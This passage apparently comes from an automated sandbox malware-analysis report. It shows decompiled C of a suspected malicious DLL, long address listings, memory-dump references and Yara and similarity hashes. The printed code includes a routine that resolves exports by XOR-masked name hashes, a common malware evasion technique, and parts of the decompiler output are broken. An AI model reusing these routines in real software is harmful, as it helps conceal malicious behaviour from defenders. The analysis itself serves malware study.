					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L53:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L86:
								if(_t427[2] <= 5) {
									L88:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L115:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L122:
										if((_t427[1] & 0x00000004) == 0) {
											L130:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L136;
											} else {
												L133:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L136:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L129:
												_t274 =  &(_t274[1]);
												goto L130;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L127:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L129;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L127;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L122;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L133;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L136;
								}
								L87:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L88;
							}
							if(_t250 != 0x8e) {
								L67:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L88;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L84:
										if(( *_t427 & 0x00000009) != 0) {
											goto L87;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L87;
											}
											goto L88;
										}
										if(_t250 == 0xc5) {
											goto L87;
										}
										if(_t250 == 0x50) {
											goto L84;
										}
									}
									goto L88;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L88;
								} else {
									goto L69;
								}
								while(1) {
									L69:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L88;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L88;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L87;
								}
								goto L88;
							}
							if(_t427[2] == 1) {
								goto L87;
							}
							goto L86;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L87;
							} else {
								goto L88;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L87;
								}
								goto L88;
							} else {
								goto L67;
							}
						}
					}
					if(_t427[3] == 3) {
						L52:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L53;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L53;
							}
							goto L52;
						}
						_t413 = _t413 + 2;
					}
					goto L52;
				}
			}






































































                                                                                                                                                  0x6e9b9377
                                                                                                                                                  0x6e9b937b
                                                                                                                                                  0x6e9b9387
                                                                                                                                                  0x6e9b938b
                                                                                                                                                  0x6e9b938f
                                                                                                                                                  0x6e9b9394
                                                                                                                                                  0x6e9b9397
                                                                                                                                                  0x6e9b9399
                                                                                                                                                  0x6e9b939b
                                                                                                                                                  0x6e9b939b
                                                                                                                                                  0x6e9b939e
                                                                                                                                                  0x6e9b93a4
                                                                                                                                                  0x6e9b941c
                                                                                                                                                  0x6e9b9420
                                                                                                                                                  0x6e9b9423
                                                                                                                                                  0x6e9b9423
                                                                                                                                                  0x6e9b9426
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9426
                                                                                                                                                  0x6e9b93ab
                                                                                                                                                  0x6e9b9413
                                                                                                                                                  0x6e9b9417
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9417
                                                                                                                                                  0x6e9b93b2
                                                                                                                                                  0x6e9b940b
                                                                                                                                                  0x6e9b940e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b940e
                                                                                                                                                  0x6e9b93b7
                                                                                                                                                  0x6e9b93f5
                                                                                                                                                  0x6e9b93fc
                                                                                                                                                  0x6e9b93ff
                                                                                                                                                  0x6e9b93c8
                                                                                                                                                  0x6e9b93c8
                                                                                                                                                  0x6e9b93ce
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b93d3
                                                                                                                                                  0x6e9b93d4
                                                                                                                                                  0x6e9b93d4
                                                                                                                                                  0x6e9b9429
                                                                                                                                                  0x6e9b9429
                                                                                                                                                  0x6e9b9429
                                                                                                                                                  0x6e9b9432
                                                                                                                                                  0x6e9b943b
                                                                                                                                                  0x6e9b943e
                                                                                                                                                  0x6e9b9441
                                                                                                                                                  0x6e9b9444
                                                                                                                                                  0x6e9b9447
                                                                                                                                                  0x6e9b944d
                                                                                                                                                  0x6e9b948f
                                                                                                                                                  0x6e9b9492
                                                                                                                                                  0x6e9b9493
                                                                                                                                                  0x6e9b949a
                                                                                                                                                  0x6e9b949d
                                                                                                                                                  0x6e9b944f
                                                                                                                                                  0x6e9b9453
                                                                                                                                                  0x6e9b945d
                                                                                                                                                  0x6e9b9464
                                                                                                                                                  0x6e9b9466
                                                                                                                                                  0x6e9b947f
                                                                                                                                                  0x6e9b9482
                                                                                                                                                  0x6e9b9482
                                                                                                                                                  0x6e9b9464
                                                                                                                                                  0x6e9b94a5
                                                                                                                                                  0x6e9b94a8
                                                                                                                                                  0x6e9b94ab
                                                                                                                                                  0x6e9b94af
                                                                                                                                                  0x6e9b94b3
                                                                                                                                                  0x6e9b94bd
                                                                                                                                                  0x6e9b94c1
                                                                                                                                                  0x6e9b94cb
                                                                                                                                                  0x6e9b94d4
                                                                                                                                                  0x6e9b94e1
                                                                                                                                                  0x6e9b94e4
                                                                                                                                                  0x6e9b94e7
                                                                                                                                                  0x6e9b94e7
                                                                                                                                                  0x6e9b94f3
                                                                                                                                                  0x6e9b94fe
                                                                                                                                                  0x6e9b9504
                                                                                                                                                  0x6e9b9508
                                                                                                                                                  0x6e9b94f5
                                                                                                                                                  0x6e9b94f5
                                                                                                                                                  0x6e9b94f5
                                                                                                                                                  0x6e9b9510
                                                                                                                                                  0x6e9b953a
                                                                                                                                                  0x6e9b9540
                                                                                                                                                  0x6e9b9540
                                                                                                                                                  0x6e9b9548
                                                                                                                                                  0x6e9b98f1
                                                                                                                                                  0x6e9b98f7
                                                                                                                                                  0x6e9b98fd
                                                                                                                                                  0x6e9b98fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b954e
                                                                                                                                                  0x6e9b954e
                                                                                                                                                  0x6e9b9552
                                                                                                                                                  0x6e9b9555
                                                                                                                                                  0x6e9b9558
                                                                                                                                                  0x6e9b955b
                                                                                                                                                  0x6e9b955f
                                                                                                                                                  0x6e9b9561
                                                                                                                                                  0x6e9b9564
                                                                                                                                                  0x6e9b9567
                                                                                                                                                  0x6e9b956b
                                                                                                                                                  0x6e9b9570
                                                                                                                                                  0x6e9b9573
                                                                                                                                                  0x6e9b9577
                                                                                                                                                  0x6e9b957c
                                                                                                                                                  0x6e9b957f
                                                                                                                                                  0x6e9b9581
                                                                                                                                                  0x6e9b9584
                                                                                                                                                  0x6e9b9588
                                                                                                                                                  0x6e9b958d
                                                                                                                                                  0x6e9b959d
                                                                                                                                                  0x6e9b95a3
                                                                                                                                                  0x6e9b95a3
                                                                                                                                                  0x6e9b95ab
                                                                                                                                                  0x6e9b95ad
                                                                                                                                                  0x6e9b95b6
                                                                                                                                                  0x6e9b95b8
                                                                                                                                                  0x6e9b95bb
                                                                                                                                                  0x6e9b95c6
                                                                                                                                                  0x6e9b95f3
                                                                                                                                                  0x6e9b95c8
                                                                                                                                                  0x6e9b95df
                                                                                                                                                  0x6e9b95df
                                                                                                                                                  0x6e9b95fb
                                                                                                                                                  0x6e9b9601
                                                                                                                                                  0x6e9b9607
                                                                                                                                                  0x6e9b9607
                                                                                                                                                  0x6e9b95fb
                                                                                                                                                  0x6e9b95b6
                                                                                                                                                  0x6e9b960e
                                                                                                                                                  0x6e9b967f
                                                                                                                                                  0x6e9b9684
                                                                                                                                                  0x6e9b96dd
                                                                                                                                                  0x6e9b979f
                                                                                                                                                  0x6e9b97a4
                                                                                                                                                  0x6e9b97b3
                                                                                                                                                  0x6e9b97b9
                                                                                                                                                  0x6e9b97bd
                                                                                                                                                  0x6e9b97c6
                                                                                                                                                  0x6e9b97cd
                                                                                                                                                  0x6e9b97d6
                                                                                                                                                  0x6e9b97e4
                                                                                                                                                  0x6e9b97e7
                                                                                                                                                  0x6e9b97cf
                                                                                                                                                  0x6e9b97cf
                                                                                                                                                  0x6e9b97cf
                                                                                                                                                  0x6e9b97cd
                                                                                                                                                  0x6e9b97f0
                                                                                                                                                  0x6e9b981d
                                                                                                                                                  0x6e9b9830
                                                                                                                                                  0x6e9b9838
                                                                                                                                                  0x6e9b981f
                                                                                                                                                  0x6e9b9821
                                                                                                                                                  0x6e9b9829
                                                                                                                                                  0x6e9b9829
                                                                                                                                                  0x6e9b97f2
                                                                                                                                                  0x6e9b97f7
                                                                                                                                                  0x6e9b9816
                                                                                                                                                  0x6e9b97f9
                                                                                                                                                  0x6e9b97fe
                                                                                                                                                  0x6e9b980f
                                                                                                                                                  0x6e9b9800
                                                                                                                                                  0x6e9b9800
                                                                                                                                                  0x6e9b9800
                                                                                                                                                  0x6e9b97fe
                                                                                                                                                  0x6e9b97f7
                                                                                                                                                  0x6e9b9840
                                                                                                                                                  0x6e9b984f
                                                                                                                                                  0x6e9b985c
                                                                                                                                                  0x6e9b9865
                                                                                                                                                  0x6e9b9869
                                                                                                                                                  0x6e9b986d
                                                                                                                                                  0x6e9b9870
                                                                                                                                                  0x6e9b9873
                                                                                                                                                  0x6e9b9876
                                                                                                                                                  0x6e9b9879
                                                                                                                                                  0x6e9b987c
                                                                                                                                                  0x6e9b9882
                                                                                                                                                  0x6e9b9886
                                                                                                                                                  0x6e9b988c
                                                                                                                                                  0x6e9b988c
                                                                                                                                                  0x6e9b9882
                                                                                                                                                  0x6e9b9892
                                                                                                                                                  0x6e9b98cf
                                                                                                                                                  0x6e9b98d3
                                                                                                                                                  0x6e9b98da
                                                                                                                                                  0x6e9b98e0
                                                                                                                                                  0x6e9b9894
                                                                                                                                                  0x6e9b9897
                                                                                                                                                  0x6e9b98b7
                                                                                                                                                  0x6e9b98bb
                                                                                                                                                  0x6e9b98c2
                                                                                                                                                  0x6e9b98c9
                                                                                                                                                  0x6e9b9899
                                                                                                                                                  0x6e9b989c
                                                                                                                                                  0x6e9b989e
                                                                                                                                                  0x6e9b98a2
                                                                                                                                                  0x6e9b98ac
                                                                                                                                                  0x6e9b98b2
                                                                                                                                                  0x6e9b98b2
                                                                                                                                                  0x6e9b989c
                                                                                                                                                  0x6e9b9897
                                                                                                                                                  0x6e9b98e7
                                                                                                                                                  0x6e9b98e7
                                                                                                                                                  0x6e9b9900
                                                                                                                                                  0x6e9b9900
                                                                                                                                                  0x6e9b9906
                                                                                                                                                  0x6e9b990b
                                                                                                                                                  0x6e9b9965
                                                                                                                                                  0x6e9b996a
                                                                                                                                                  0x6e9b99a9
                                                                                                                                                  0x6e9b99ae
                                                                                                                                                  0x6e9b99b0
                                                                                                                                                  0x6e9b99b4
                                                                                                                                                  0x6e9b99b7
                                                                                                                                                  0x6e9b99ba
                                                                                                                                                  0x6e9b99bc
                                                                                                                                                  0x6e9b99bd
                                                                                                                                                  0x6e9b99bd
                                                                                                                                                  0x6e9b99c2
                                                                                                                                                  0x6e9b99e0
                                                                                                                                                  0x6e9b99e2
                                                                                                                                                  0x6e9b99e6
                                                                                                                                                  0x6e9b99ec
                                                                                                                                                  0x6e9b99ef
                                                                                                                                                  0x6e9b99f1
                                                                                                                                                  0x6e9b99f2
                                                                                                                                                  0x6e9b99f2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b99c4
                                                                                                                                                  0x6e9b99c4
                                                                                                                                                  0x6e9b99c4
                                                                                                                                                  0x6e9b99c8
                                                                                                                                                  0x6e9b99ce
                                                                                                                                                  0x6e9b99d1
                                                                                                                                                  0x6e9b99d3
                                                                                                                                                  0x6e9b99d6
                                                                                                                                                  0x6e9b99f5
                                                                                                                                                  0x6e9b99f5
                                                                                                                                                  0x6e9b99fc
                                                                                                                                                  0x6e9b9a16
                                                                                                                                                  0x6e9b99fe
                                                                                                                                                  0x6e9b99fe
                                                                                                                                                  0x6e9b9a0a
                                                                                                                                                  0x6e9b9a0b
                                                                                                                                                  0x6e9b9a0e
                                                                                                                                                  0x6e9b9a0e
                                                                                                                                                  0x6e9b9a24
                                                                                                                                                  0x6e9b9a24
                                                                                                                                                  0x6e9b99c2
                                                                                                                                                  0x6e9b996f
                                                                                                                                                  0x6e9b997d
                                                                                                                                                  0x6e9b9995
                                                                                                                                                  0x6e9b9999
                                                                                                                                                  0x6e9b999c
                                                                                                                                                  0x6e9b99a2
                                                                                                                                                  0x6e9b99a6
                                                                                                                                                  0x6e9b99a6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b99a6
                                                                                                                                                  0x6e9b997f
                                                                                                                                                  0x6e9b9983
                                                                                                                                                  0x6e9b9989
                                                                                                                                                  0x6e9b9989
                                                                                                                                                  0x6e9b998f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b998f
                                                                                                                                                  0x6e9b9971
                                                                                                                                                  0x6e9b9975
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9975
                                                                                                                                                  0x6e9b990f
                                                                                                                                                  0x6e9b993b
                                                                                                                                                  0x6e9b9953
                                                                                                                                                  0x6e9b9957
                                                                                                                                                  0x6e9b995a
                                                                                                                                                  0x6e9b995d
                                                                                                                                                  0x6e9b995f
                                                                                                                                                  0x6e9b9962
                                                                                                                                                  0x6e9b993d
                                                                                                                                                  0x6e9b993d
                                                                                                                                                  0x6e9b9941
                                                                                                                                                  0x6e9b9944
                                                                                                                                                  0x6e9b9947
                                                                                                                                                  0x6e9b994a
                                                                                                                                                  0x6e9b994d
                                                                                                                                                  0x6e9b994d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b993b
                                                                                                                                                  0x6e9b9915
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b991b
                                                                                                                                                  0x6e9b991f
                                                                                                                                                  0x6e9b9925
                                                                                                                                                  0x6e9b9928
                                                                                                                                                  0x6e9b992b
                                                                                                                                                  0x6e9b992e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b992e
                                                                                                                                                  0x6e9b97a6
                                                                                                                                                  0x6e9b97aa
                                                                                                                                                  0x6e9b97b0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b97b0
                                                                                                                                                  0x6e9b96e8
                                                                                                                                                  0x6e9b96fa
                                                                                                                                                  0x6e9b96ff
                                                                                                                                                  0x6e9b976a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9771
                                                                                                                                                  0x6e9b9797
                                                                                                                                                  0x6e9b979b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b977a
                                                                                                                                                  0x6e9b977f
                                                                                                                                                  0x6e9b9793
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9795
                                                                                                                                                  0x6e9b9786
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b978b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b978d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9771
                                                                                                                                                  0x6e9b9701
                                                                                                                                                  0x6e9b970b
                                                                                                                                                  0x6e9b971c
                                                                                                                                                  0x6e9b971f
                                                                                                                                                  0x6e9b9722
                                                                                                                                                  0x6e9b9728
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b972e
                                                                                                                                                  0x6e9b972e
                                                                                                                                                  0x6e9b972e
                                                                                                                                                  0x6e9b9735
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9737
                                                                                                                                                  0x6e9b973a
                                                                                                                                                  0x6e9b9740
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9742
                                                                                                                                                  0x6e9b9744
                                                                                                                                                  0x6e9b974d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9761
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9763
                                                                                                                                                  0x6e9b96ef
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b96f5
                                                                                                                                                  0x6e9b9689
                                                                                                                                                  0x6e9b96b8
                                                                                                                                                  0x6e9b96b9
                                                                                                                                                  0x6e9b96c2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b96d3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b96d3
                                                                                                                                                  0x6e9b9690
                                                                                                                                                  0x6e9b9693
                                                                                                                                                  0x6e9b96a6
                                                                                                                                                  0x6e9b96a7
                                                                                                                                                  0x6e9b96ab
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9693
                                                                                                                                                  0x6e9b9689
                                                                                                                                                  0x6e9b9615
                                                                                                                                                  0x6e9b9672
                                                                                                                                                  0x6e9b9676
                                                                                                                                                  0x6e9b967c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b967c
                                                                                                                                                  0x6e9b9617
                                                                                                                                                  0x6e9b961b
                                                                                                                                                  0x6e9b9628
                                                                                                                                                  0x6e9b962c
                                                                                                                                                  0x6e9b9642
                                                                                                                                                  0x6e9b964a
                                                                                                                                                  0x6e9b962e
                                                                                                                                                  0x6e9b9630
                                                                                                                                                  0x6e9b963a
                                                                                                                                                  0x6e9b963a
                                                                                                                                                  0x6e9b9650
                                                                                                                                                  0x6e9b9659
                                                                                                                                                  0x6e9b9670
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9670
                                                                                                                                                  0x6e9b965b
                                                                                                                                                  0x6e9b965b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9650

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                  • Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
                                                                                                                                                  • Instruction ID: 38ab198c6f049804df4d046819a6158f1e940a3e2c743c5feeff2300b8492087
                                                                                                                                                  • Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
                                                                                                                                                  • Instruction Fuzzy Hash: E0229D3141839ACBD754CF99C4A136BBBE5BFA6300F10886EE8E54B291D335D985CF92
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B143C, Relevance: .6, Instructions: 572COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                  			E6E9B143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6E9B0304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6e9bd208 == 0 ||  *0x6e9bd2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6E9B4FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6e9bd2f0 |  *0x6e9bd2f1;
									if(( *0x6e9bd2f0 |  *0x6e9bd2f1) == 0) {
										_t525 =  *0x6e9bd208; // 0x12f1340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6e9bd2f0 = 1;
											_t526 = E6E9B361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6E9B1C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6e9bd208 = _t526;
											 *0x6e9bd2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
